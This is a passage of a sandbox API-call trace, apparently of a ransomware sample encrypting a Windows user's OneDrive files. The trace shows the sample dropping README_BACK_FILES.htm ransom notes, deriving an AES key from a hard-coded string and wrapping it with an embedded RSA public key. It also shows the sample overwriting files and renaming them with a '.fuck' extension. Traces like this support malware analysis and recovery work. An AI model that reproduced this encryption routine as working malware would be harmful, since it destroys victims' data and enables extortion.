(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.854] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.857] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.858] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0271.858] CryptDestroyKey (hKey=0x2fab88) returned 1 [0271.858] CryptReleaseContext (hProv=0x2f27c38, dwFlags=0x0) returned 1 [0271.858] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.858] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0271.859] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\readme_back_files.htm")) returned 0xffffffff [0271.859] AreFileApisANSI () returned 1 [0271.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0271.859] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.860] GetFileType (hFile=0x5d3c) returned 0x1 [0271.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.865] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.865] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0271.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.865] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0271.865] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\amd64\\readme_back_files.htm")) returned 0xffffffff [0271.865] AreFileApisANSI () returned 1 [0271.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0271.865] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.867] GetFileType (hFile=0x5d3c) returned 0x1 [0271.867] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.868] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.868] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.868] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.868] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.869] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.938] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.938] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.939] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.940] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.940] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.940] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.940] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0271.940] GetLastError () returned 0x0 [0271.940] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png")) returned 0x20 [0271.941] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png", dwFileAttributes=0x80) returned 1 [0271.942] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png.gsg", dwFileAttributes=0x2) returned 1 [0271.945] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0271.947] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0271.947] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0271.947] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.947] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0271.947] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.947] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0271.948] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f28320) returned 1 [0271.948] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28320, dwCertEncodingType=0x1, pInfo=0x2f32b80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32bb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32bb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fab08) returned 1 [0271.948] CryptEncrypt (in: hKey=0x2fab08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0271.948] CryptEncrypt (in: hKey=0x2fab08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28540*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f28540*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0271.948] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28540*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f28540*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0271.949] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.951] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.096] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x7b, lpOverlapped=0x0) returned 1 [0272.098] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x7b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x80) returned 1 [0272.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.098] CloseHandle (hObject=0x5d3c) returned 1 [0272.098] CloseHandle (hObject=0x5d4c) returned 1 [0272.098] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png"), bFailIfExists=0) returned 1 [0272.101] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png", dwFileAttributes=0x0) returned 1 [0272.101] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png.gsg")) returned 1 [0272.102] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppBlue.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appblue.png.fuck")) returned 1 [0272.104] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0272.104] CryptDestroyKey (hKey=0x2fa748) returned 1 [0272.104] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.104] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.104] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0272.104] GetLastError () returned 0x0 [0272.104] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png")) returned 0x20 [0272.104] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png", dwFileAttributes=0x80) returned 1 [0272.105] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.106] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.107] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png.gsg", dwFileAttributes=0x2) returned 1 [0272.107] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0272.109] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0272.109] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.109] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.109] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa6c8) returned 1 [0272.109] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.110] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0272.110] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 